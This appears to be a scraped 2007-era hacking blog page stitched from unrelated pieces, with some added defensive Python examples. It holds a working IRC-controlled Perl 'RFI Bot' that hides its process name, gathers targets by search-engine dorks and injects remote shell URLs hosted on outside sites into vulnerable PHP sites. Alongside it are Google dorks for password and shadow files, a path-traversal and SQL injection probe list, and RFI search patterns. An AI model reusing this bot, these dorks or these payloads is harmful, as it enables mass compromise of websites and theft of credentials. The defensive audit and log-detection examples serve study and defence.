if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);

}
}
}
@files5 = <$input/*/*/*/*/*>;
foreach $file (@files5) {
print "Checking: " .$file . "\n";


open(MYINPUTFILE, "$file");
while(<MYINPUTFILE>)
{

my($line) = $_;

chomp($line);
if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);

}
}
}
@files6 = <$input/*/*/*/*/*/*>;
foreach $file (@files6) {
print "Checking: " .$file . "\n";


open(MYINPUTFILE, "$file");
while(<MYINPUTFILE>)
{

my($line) = $_;

chomp($line);
if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);

}
}
}
@files7 = <$input/*/*/*/*/*/*/*>;
foreach $file (@files7) {
print "Checking: " .$file . "\n";


open(MYINPUTFILE, "$file");
while(<MYINPUTFILE>)
{

my($line) = $_;

chomp($line);
if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);

}
}
}


print "Done! Check results.html for the found inclusions!";
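
The same source audit as the Perl script above, as an added Python example that is not Ironfist's code: it walks the tree to any depth instead of seven fixed glob levels, skips commented-out and single-quoted text, separates request-driven includes from other variables, and HTML-escapes the report. The sample PHP files, the function names and the "request"/"variable" labels are constructed for illustration.

```python
import html
import os
import re
import tempfile

# include/require(_once) not preceded by "$", "->" or a word character
# (so "$include = ..." is ignored), then its argument up to the ";".
INCLUDE_RE = re.compile(
    r"(?<![$\w>])(?:include|require)(?:_once)?\b\s*\(?(?P<arg>[^;]*);", re.I)
SINGLE_QUOTED_RE = re.compile(r"'(?:\\.|[^'\\])*'")  # never interpolated by PHP
VARIABLE_RE = re.compile(r"\$[A-Za-z_]\w*")
REQUEST_RE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")

def strip_comments(line, in_block):
    """Remove //, # and /* */ comments from one line, keeping quoted text.
    Strings that span several lines and heredocs are not tracked."""
    out, i, quote = [], 0, None
    while i < len(line):
        two = line[i:i + 2]
        if in_block:
            in_block = two != "*/"
            i += 1 if in_block else 2
        elif quote:
            out.append(line[i])
            if line[i] == "\\" and i + 1 < len(line):
                out.append(line[i + 1])
                i += 1
            elif line[i] == quote:
                quote = None
            i += 1
        elif two == "/*":
            in_block, i = True, i + 2
        elif two == "//" or line[i] == "#":
            break
        else:
            if line[i] in "'\"":
                quote = line[i]
            out.append(line[i])
            i += 1
    return "".join(out), in_block

def scan_file(path):
    """Return [(line number, severity, source line)] for one PHP file."""
    findings, in_block = [], False
    with open(path, encoding="utf-8", errors="replace") as handle:
        for lineno, raw in enumerate(handle, 1):
            code, in_block = strip_comments(raw.rstrip("\n"), in_block)
            for match in INCLUDE_RE.finditer(code):
                arg = SINGLE_QUOTED_RE.sub("''", match.group("arg"))
                if VARIABLE_RE.search(arg):
                    severity = "request" if REQUEST_RE.search(arg) else "variable"
                    findings.append((lineno, severity, raw.strip()))
    return findings

def scan_tree(root, extensions=(".php", ".inc", ".phtml")):
    """Walk root to any depth; return [(relative path, line, severity, source)]."""
    results = []
    for folder, dirs, files in os.walk(root):
        dirs.sort()  # deterministic traversal order
        for name in sorted(files):
            if name.lower().endswith(extensions):
                path = os.path.join(folder, name)
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                results.extend((rel,) + hit for hit in scan_file(path))
    return results

def render_html(results):
    """Build the report with every untrusted field HTML-escaped."""
    rows = ["<tr><td>%s</td><td>%d</td><td>%s</td><td><code>%s</code></td></tr>"
            % (html.escape(rel), line, severity, html.escape(source))
            for rel, line, severity, source in results]
    return "<table>\n" + "\n".join(rows) + "\n</table>\n"

SAMPLE_TREE = {  # constructed PHP sources, written to a temporary directory
    "index.php": "<?php\n"
                 "// include($_GET['page']);  commented out: not reported\n"
                 "include($_GET['page'] . \".php\");\n"
                 "require_once 'lib/config.php';\n",
    "modules/deep/a/b/loader.php": "<?php\n"
                 "$base = dirname(__FILE__);\n"
                 "/* require $old;\n"
                 "   still inside the block comment */\n"
                 "require_once $base . '/util.php';\n"
                 "include 'static-$name.php';\n"
                 "$include = $x;\n",
}

def demo():
    """Write SAMPLE_TREE to a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, text in SAMPLE_TREE.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as handle:
                handle.write(text)
        return scan_tree(root)

if __name__ == "__main__":
    print(render_html(demo()))
```

A "variable" finding still needs a manual read of where the variable is assigned; only the "request" class is driven by user input on the line itself.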
RFI Bot - Scan created by PERL







#!/usr/bin/perl
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

###############CONFIGURATION###################
my $processo = "/usr/local/apache/bin/nscan -DSSL";
my $printcmd="http://geocities.com/alexlz_19/kewog.txt?"; #<---- Change this for your CMD
my $server="irc.server.org";
my $porta="6667";
my $nick="BOT-NAME";
my $chan="#channel";
###############END OF CONFIGURATION############

my $verbot = "2.0";
my $cmd="http://www.youthsoroca.md/php-nuke/foto/safe.jpg"; #Never change this
my $pid=fork;
exit if $pid;
$0="$processo"."\0"x16;
my $sk = IO::Socket::INET->new(PeerAddr=>"$server",PeerPort=>"$porta",Proto=>"tcp") or die "Can not connect on server!\n";
$sk->autoflush(1);
print $sk "NICK $nick\r\n";
print $sk "USER Google 8 * : Google : google@google.it : Google :Google\r\n";
print $sk "JOIN $chan\r\n";
print $sk "PRIVMSG $chan :1,0[7S1,0can-Bot] Scan is 3ON1 : 12!scan \r\n";

while($line = <$sk>){

$line =~ s/\r\n$//;
if ($line=~ /^PING \:(.*)/)
{
print "PONG :$1";
print $sk "PONG :$1";
}

if ($line=~ /PRIVMSG $chan :.deletebot/){
stampa($sk, "QUIT");
}

if ($line=~ /PRIVMSG $chan :!scan\s+(.*?)\s+(.*)/){
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my $bug=$1;
my $dork=$2;
my $contatore=0;
my ($type,$space);
my %hosts;
stampa($sk, "PRIVMSG $chan :1,0[7S1,0can] Started: $bug - Dork: $dork Engine: Google ");
stampa($sk, "PRIVMSG $chan :1,0[7G1,0oogle] Scanning now...");
my @glist=&google($dork);
stampa($sk, "PRIVMSG $chan :1,0[7M1,0sn] Scanning now...");
my @mlist=&msn($dork);
stampa($sk, "PRIVMSG $chan :1,0[7A1,0ltavista] Scanning now...");
my @alist=&altavista($dork);
stampa($sk, "PRIVMSG $chan :1,0[7L1,0ibero] Scanning now...");
my @llist=&libero($dork);
stampa($sk, "PRIVMSG $chan :1,0[7A1,0lltheweb] Scanning now...");
my @allist=&alltheweb($dork);
stampa($sk, "PRIVMSG $chan :1,0[7A1,0sk] Scanning now...");
my @asklist=&ask($dork);
stampa($sk, "PRIVMSG $chan :1,0[7U1,0ol] Scanning now...");
my @uollist=&uol($dork);
stampa($sk, "PRIVMSG $chan :1,0[7A1,0ol] Scanning now...");
my @aollist=&aol($dork);
push(my @tot, @glist, @ylist, @mlist, @alist, @llist, @allist,@asklist,@uollist,@aollist);
my @puliti=&unici(@tot);
stampa($sk, "PRIVMSG $chan :1,0[7S1,0can] Total results: ".scalar(@tot)." Sites!");
stampa($sk, "PRIVMSG $chan :1,0[7S1,0can] Cleaned results: ".scalar(@puliti)." Sites!");
stampa($sk, "PRIVMSG $chan :1,0[7S1,0can] Exploting started! ");
my $uni=scalar(@puliti);
foreach my $sito (@puliti)
{
$contatore++;
if ($contatore %30==0){
}
my $test="http://".$sito.$bug.$cmd."?";
my $print="http://".$sito.$bug.$printcmd."?";
my $req=HTTP::Request->new(GET=>$test);
my $ua=LWP::UserAgent->new();
$ua->timeout(5);
my $response=$ua->request($req);
if ($response->is_success) {
my $re=$response->content;
if($re =~ /31337/ && $re =~ /uid=/){
my $hs=geths($print); $hosts{$hs}++;
if($hosts{$hs}=="1"){
$x=os($test);
($type,$space,$ker)=split(/\,/,$x);
stampa($sk, "PRIVMSG $chan :1,0[7S1afe4OFF1] 1,0[7S1ys4 ".$type."1] 1,0[7F1ree4 ".$space." 1] $print ");
stampa($sk, "PRIVMSG $chan :1,0[7I1nformation1]4 $ker  ");
checksafemode("$print");}}
elsif($re =~ /31337/)
{
my $hs=geths($print); $hosts{$hs}++;
if($hosts{$hs}=="1"){
$x=os($test);
($type,$space,$ker)=split(/\,/,$x);
stampa($sk, "PRIVMSG $chan :1,0[7S1afe3ON1] 1,0[7S1ys3 ".$type."1] 1,0[7F1ree3 ".$space." 1] $print ");
stampa($sk, "PRIVMSG $chan :1,0[7I1nformation1]3 $ker  ");
checksafemode("$print");}}
}}}
exit;
}}}


sub stampa()
{
if ($#_ == '1') {
my $sk = $_[0];
print $sk "$_[1]\n";
} else {
print $sk "$_[0]\n";
}}

sub os(){
my $sito=$_[0];
my $Res=query($sito);
my $type;
my $space;
my $ker;
my $str;
while($Res=~m/
OSTYPE:(.+?)\
/g){
$type=$1;
}
while($Res=~m/
Kernel:(.+?)\
/g){
$ker=$1;
}
while($Res=~m/
Free:(.+?)\
/g){
$space=$1;
}
$str=$type.",".$space.",".$ker;
return $str;
}

sub aol(){
my @lst;
my $key = $_[0];
for($b=1;$b<=100;$b++){
my $AoL=("http://search.aol.com/aol/search?query=".key($key)."&page=".$b."&nt=null&ie=UTF-8");
my $Res=query($AoL);
while($Res =~ m/

http:\/\/(.+?)\<\/p>/g){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}

sub google(){
my @lst;
my $key = $_[0];
for($b=0;$b<=1000;$b+=100){
my $Go=("http://www.google.it/search?hl=it&q=".key($key)."&num=100&filter=0&start=".$b);
my $Res=query($Go);
while($Res =~ m/\"]*)\//g){
if ($1 !~ /google/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}

sub yahoo(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=100){
my $Ya=("http://search.yahoo.com/search?ei=UTF-8&p=".key($key)."&n=100&fr=sfp&b=".$b);
my $Res=query($Ya);
while($Res =~ m/\(.+?)\<\/em>/g){
my $k=$1;
$k=~s///g;
$k=~s/<\/b>//g;
$k=~s///g;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}

sub altavista(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=10){
my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b);
my $Res=query($AlT);
while($Res=~m/(.+?)\//g){
if($1 !~ /altavista/){
my $k=$1;
$k=~s/$k=~s/ //g;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}

sub msn(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=10){
my $MsN=("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE");
my $Res=query($MsN);
while($Res =~ m/
\"]*)\//g){
if($1 !~ /msn|live/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}

sub libero(){
my @lst;
my $key=$_[0];
my $i=0;
my $pg=0;
for($i=0,$pg=0; $i<=1000; $i+=10,$pg++)
{
my $Lib=("http://arianna.libero.it/search/abin/integrata.cgi?s=1&pag=".$pg."&start=".$i."&query=".key($key));
my $Res=query($Lib);
while($Res =~ m/
\"]*)\//g){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}

sub ask(){
my @lst;
my $key=$_[0];
my $i=0;
my $pg=0;
for($i=0; $i<=1000; $i+=10)
{
my $Ask=("http://it.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all");
my $Res=query($Ask);
while($Res=~m/
my $k=$3;
$k=~s/[\"\ ]//g;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}

sub alltheweb()
{
my @lst;
my $key=$_[0];
my $i=0;
my $pg=0;
for($i=0; $i<=1000; $i+=100)
{
my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
my $Res=query($all);
while($Res =~ m/http:\/\/(.+?)\<\/span>/g){
my $k=$1;
$k=~s/ //g;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}

sub uol(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=10){
my $UoL=("http://busca.uol.com.br/www/index.html?q=".key($key)."&start=".$i);
my $Res=query($UoL);
while($Res =~ m/
\"]*)/g){
my $k=$1;
if($k!~/busca|uol|yahoo/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}


sub links()
{
my @l;
my $link=$_[0];
my $host=$_[0];
my $hdir=$_[0];
$hdir=~s/(.*)\/[^\/]*$/\1/;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host.="/";
$link.="/";
$hdir.="/";
$host=~s/\/\//\//g;
$hdir=~s/\/\//\//g;
$link=~s/\/\//\//g;
push(@l,$link,$host,$hdir);
return @l;
}

sub geths(){
my $host=$_[0];
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
return $host;
}

sub key(){
my $chiave=$_[0];
$chiave =~ s/ /\+/g;
$chiave =~ s/:/\%3A/g;
$chiave =~ s/\//\%2F/g;
$chiave =~ s/&/\%26/g;
$chiave =~ s/\"/\%22/g;
$chiave =~ s/,/\%2C/g;
$chiave =~ s/\\/\%5C/g;
return $chiave;
}

sub query($){
my $url=$_[0];
$url=~s/http:\/\///;
my $host=$url;
my $query=$url;
my $page="";
$host=~s/href=\"?http:\/\///;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query=~s/$host//;
if ($query eq "") {$query="/";};
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
close($sock);
};
return $page;
}


sub unici{
my @unici = ();
my %visti = ();
foreach my $elemento ( @_ )
{
next if $visti{ $elemento }++;
push @unici, $elemento;
}
return @unici;
}
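
From the defender's side, the request this bot builds (`http://` + site + path + a remote URL + `?`) shows up in web server access logs as a query parameter whose value is itself a URL. The following added example, which is not part of the original post, flags such requests; the log lines, addresses, host names and the "probe"/"review" labels are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+(?: "[^"]*" "(?P<agent>[^"]*)")?')
REMOTE_RE = re.compile(r"(?:https?|ftp)://", re.I)


def remote_params(target):
    """Return [(name, value)] for query parameters whose value is a remote URL."""
    hits = []
    for pair in re.split(r"[&;]", target.partition("?")[2]):
        name, _, value = pair.partition("=")
        value = unquote(unquote(value)).strip()  # also catches double encoding
        if REMOTE_RE.match(value):
            hits.append((unquote(name), value))
    return hits


def analyse(lines):
    """Return (hits, verdicts). An address is a "probe" when a remote value
    ends in "?" as the bot's requests do, or when it tried more than one
    script; a single remote value without that suffix is left for "review"."""
    hits, seen = [], defaultdict(lambda: {"paths": set(), "suffix": False})
    for line in lines:
        entry = LOG_RE.match(line)
        if not entry:
            continue  # not a combined-format request line
        path = entry["target"].partition("?")[0]
        for name, value in remote_params(entry["target"]):
            hits.append({"ip": entry["ip"], "path": path, "param": name,
                         "value": value, "status": int(entry["status"]),
                         "agent": entry["agent"] or ""})
            seen[entry["ip"]]["paths"].add(path)
            seen[entry["ip"]]["suffix"] |= value.endswith("?")
    verdicts = {ip: "probe" if s["suffix"] or len(s["paths"]) > 1 else "review"
                for ip, s in seen.items()}
    return hits, verdicts


SAMPLE_LOG = [  # constructed lines using documentation address ranges
    '198.51.100.7 - - [25/Nov/2007:10:15:02 +0700] "GET /index.php?page='
    'http://payload.example/probe.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
    '198.51.100.7 - - [25/Nov/2007:10:15:03 +0700] "GET /modules/news.php?path='
    'http%3A%2F%2Fpayload.example%2Fprobe.txt%3F HTTP/1.1" 404 210 "-" "libwww-perl/5.805"',
    '192.0.2.10 - - [25/Nov/2007:10:16:40 +0700] "GET /index.php?page=about '
    'HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [25/Nov/2007:10:17:12 +0700] "GET /redirect.php?url='
    'https://www.example.org/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    'truncated or malformed line',
]

if __name__ == "__main__":
    found, verdicts = analyse(SAMPLE_LOG)
    for hit in found:
        print(verdicts[hit["ip"]], hit["ip"], hit["status"], hit["path"],
              hit["param"], hit["value"], hit["agent"])
```

A 200 status on a hit does not show that the include succeeded; check the script's source and the PHP `allow_url_include` and `allow_url_fopen` settings on the host.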

Finding PHP Vulnerabilities With Google Code Search


Dangerous keywords in Google Search :


These keywords are so dangerous... try them


"Index of /admin"
"Index of /password"
"Index of /mail"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto

administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
global.asax index

allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov

inurl:passwd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:"auth_user_file.txt"
inurl:"wwwroot/*."


top secret site:mil
confidential site:mil

allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history

intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart

ALTERNATIVE INPUTS====================


/cgibin /shopper.exe?search=action&keywords=psiber&template=neworder.log
/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D09
/cgibin/awstats.pl%3Flang%3Dfr%26update%3D1
/cgibin/awstats.pl%3Foutput%3Dkeywords%26update%3D1
/cgibin /awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dnl
/cgibin/awstats.pl%3Flang%3Dde%26output%3Durldetail
/cgibin/mailform.pl
/cgibin/awstats.pl%3Flang%3Des%26output%3Dkeywords
/cgi-bin/shop/shopping350.mdb
/cgibin/cart/database/comersus.mdb
/dbase/date.
/www.gambling-01.co.uk/cgibin/password.txt
/cgibin/awstats.pl%3Flang%3Des
/ccbill/ccbill.log
/cgibin/awstats.pl%3Flang%3Dnl%26output%3Dkeywords
/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dde
/productcart/pc/Custvb.asp?redirectUrl=&Email=%27+having+1%3D1--&_email=email&password=asd&_password=required&Submit.x=33&Sub mit.y=5&Submit=Submit
/cgibin/index%20of
/cgi-bin/form1.cgi
/cc.txt
/cgibin/awstats.pl%3Flang%3Den%26update%3D1
/cg/./comersus/database/comersus.mdb
/cgi-bin/awstats.pl%3Foutput%3Dkeyphrases
/cgibin /webshop/templates/cc.txt
/....../ all
/....../config.sys
/....../etc/hosts
/../../../../ all
/../../../../../../../boot.ini
/../../../../../winnt/repair/sam._
/../../../../config.sys
/../../../../etc/hosts
/.access
/.bash_history
/.htacc ess
/.html/............./config.sys
/.htpasswd
/.passwd
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/Admin_files/order.log
/AdvWorks/equipment/catalog_type.asp
/Orders/order.log
/PDG_Cart/order.log
/PDG_Ca rt/shopper.conf
/PSUser/PSCOErrPage.htm
/WebShop/logs/cc.txt
/WebShop/logs/ck. log
/WebShop/templates/cc.txt
/_private
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin /fpcount.exe
/_vti_inf.html
/_vti_pvt
/_vti_pvt/administrators.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/service.pwd
/_vti_ pvt/shtml.dll
/_vti_pvt/shtml.exe
/_vti_pvt/users.pwd
/adsamples /config/site.csc
/bin
/carbo.dll
/ccbill/secure/ccbill.log
/cfdocs/cfmlsyntaxcheck.cfm
/---/docs/sourcewindow.cfm
/---/email/getfile.cfm?filename=c:boot.ini
/---/displayopenedfile.cfm
/---/exprcalc.cfm
/---/openfile.cfm
/---/sendmail.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/viewexample.cfm
/cgi
/cgi-bin
/cgi-bin/AT-admin.cgi
/cgi-bin/AT-generate.cgi
/cgi-bin/Admin_files/order.log
/cgi-bin/AnyForm2
/cgi-bin/Cgitest.exe
/cgi-bin/Count.cgi
/cgi-bin/FormHandler.cgi
/cgi-bin/GW5/GWWEB.EXE
/cgi-bin/UltraBoard.cgi
/cgi-bin /UltraBoard.pl
/cgi-bin/add_ftp.cgi
/cgi-bin/adp
/cgi-bin/adpassword.txt
/cgi-bin /ads.setup
/cgi-bin/aglimpse
/cgi-bin/alibaba.pl
/cgi-bin/allmanage.pl
/cgi-bin/allmanage/adp
/cgi-bin/allmanage/k
/cgi-bin/allmanage/settings.cfg
/cgi-bin/allmanage/userfile.dat
/cgi-bin/allmanageup.pl
/cgi-bin/anyboard.cgi
/cgi-bin/architext_query.pl
/cgi-bin/authorize/dbmfiles/users
/cgi-bin /ax-admin.cgi
/cgi-bin/ax.cgi
/cgi-bin/bigconf.cgi all
/cgi-bin/bizdb1-search.cgi
/cgi-bin/bnbform.cgi
/cgi-bin/cachemgr.cgi
/cgi-bin/calender.pl
/cgi-bin/calender_admin.pl
/cgi-bin/campas
/cgi-bin/cart.pl
/cgi-bin/cgiwrap
/cgi-bin /classifieds.cgi
/cgi-bin/clickresponder.pl
/cgi-bin/cmd.exe
/cgi-bin/counterfiglet
/cgi-bin/dbmlparser.exe
/cgi-bin/dig.cgi
/cgi-bin/dnewsweb
/cgi-bin/edit.pl
/cgi-bin/environ.cgi
/cgi-bin/excite
/cgi-bin/faxsurvey
/cgi-bin/filemail.pl
/cgi-bin /files.pl
/cgi-bin/finger
/cgi-bin/finger.pl
/cgi-bin/formmail.pl
/cgi-bin/fpcount.exe
/cgi-bin/fpexplore.exe
/cgi-bin/gH.cgi
/cgi-bin/get32.exe
/cgi-bin /glimpse
/cgi-bin/guestbook.cgi
/cgi-bin/handler
/cgi-bin/htimage.exe
/cgi-bin/htmlscript
/cgi-bin/htsearch
/cgi-bin /htsearch
/cgi-bin/iisadmpwd/achg.htr
/cgi-bin/iisadmpwd/aexp.htr
/cgi-bin /iisadmpwd/aexp2.htr
/cgi-bin/iisadmpwd/anot.htr
/cgi-bin/imagemap.exe
/cgi-bin/info2www
/cgi-bin/infosrch.cgi
/cgi-bin/input.bat
/cgi-bin/input2.bat
/cgi-bin/jj
/cgi-bin/k
/cgi-bin/loadpage.cgi
/cgi-bin /mailform.exe
/cgi-bin/maillist.pl
/cgi-bin/makechanges/easysteps/easysteps.pl
/cgi-bin/man.sh
/cgi-bin/netstat
/cgi-bin/nph-publish
/cgi-bin/nph-test-cgi
/cgi-bin/passwd
/cgi-bin/passwd.txt
/cgi-bin/perl.exe
/cgi-bin /perlshop.cgi
/cgi-bin/pfdispaly.cgi
/cgi-bin/pfdisplay
/cgi-bin /pfdisplay.cgi
/cgi-bin/phf
/cgi-bin/php.cgi
/cgi-bin/plusmail
/cgi-bin /postcard.pl
/cgi-bin/printenv
/cgi-bin/process_bug.cgi
/cgi-bin/query
/cgi-bin/responder
/cgi-bin/rguest.exe
/cgi-bin/rpm_query
/cgi-bin/rwwwshell.pl
/cgi-bin /search.cgi
/cgi-bin/settings.cfg
/cgi-bin/sojourn
/cgi-bin/survey.cgi
/cgi-bin/test-cgi
/cgi-bin/test.bat
/cgi-bin /textcounter.pl
/cgi-bin/tpgnrock
/cgi-bin/tst.bat
/cgi-bin/tst.bat
/cgi-bin/unlg1.1






Finding PHP Vulnerabilities With Google Code Search


RFI:

include\(\$
include_once\(\$
require_once\(\$
require\(\$
include\(\$_GET
include_once\(\$_GET
require_once\(\$_GET
require\(\$_GET
include\(\$_POST
include_once\(\$_POST
require_once\(\$_POST
require\(\$_POST
include\(\$HTTP_POST_VARS
require\(\$HTTP_POST_VARS
include_once\(\$HTTP_POST_VARS
require_once\(\$HTTP_POST_VARS
include\(\$HTTP_GET_VARS
require\(\$HTTP_GET_VARS
include_once\(\$HTTP_GET_VARS
require_once\(\$HTTP_GET_VARS
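
The same patterns can be run over your own PHP source tree to find dynamic includes before someone else does. The script below is an added example, not code from the original post: `audit_php`, the severity labels and the sample PHP are assumptions made for illustration, and it goes slightly beyond the patterns above by also catching the parenthesis-free form (`require $tpl;`).

```python
import re

# Request-derived arrays named in the patterns above, plus $_REQUEST and
# $_COOKIE (added here; they are attacker-controlled in the same way).
REQUEST_ARRAYS = {"_GET", "_POST", "HTTP_GET_VARS", "HTTP_POST_VARS",
                  "_REQUEST", "_COOKIE"}

# include/require (and _once forms), optional "(", then a leading $variable.
INCLUDE_RE = re.compile(
    r"\b(include_once|require_once|include|require)\s*\(?\s*\$(\w+)")

def audit_php(source):
    """Return (line_no, construct, variable, severity) for dynamic includes."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        if line.lstrip().startswith(("//", "#", "*")):
            continue  # whole-line comments only; inline comments are not parsed
        for construct, var in INCLUDE_RE.findall(line):
            # Direct use of request data is the RFI case; any other leading
            # variable needs a manual trace back to where it was assigned.
            severity = "high" if var in REQUEST_ARRAYS else "review"
            findings.append((line_no, construct, "$" + var, severity))
    return findings

# Constructed sample: lines 2-4 are risky forms, line 5 is a literal include,
# lines 7-10 are an allow-list rewrite that never puts request data in a path.
SAMPLE_PHP = r"""<?php
include($_GET['page'] . '.php');
include_once ($HTTP_POST_VARS["mod"]);
require $tpl;
require_once 'config.php';
// include($_GET['old']);
$allowed = array('home' => 'home.php', 'faq' => 'faq.php');
$key = isset($_GET['page']) ? $_GET['page'] : 'home';
$file = isset($allowed[$key]) ? $allowed[$key] : 'home.php';
include __DIR__ . '/pages/' . $file;
"""

if __name__ == "__main__":
    for finding in audit_php(SAMPLE_PHP):
        print("line %d: %s %s [%s]" % finding)
```

Like the search patterns, this only looks at what the include argument starts with, so a clean result is not proof that no request data reaches the path.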

Tuesday, November 06, 2007

How to Create an Email Address in 5 Seconds

http://www.bspamfree.org/
http://www.yopmail.com/
http://dodgeit.com/
http://www.spam.la/


Just fill in a username and you've got an email address.

from CA.com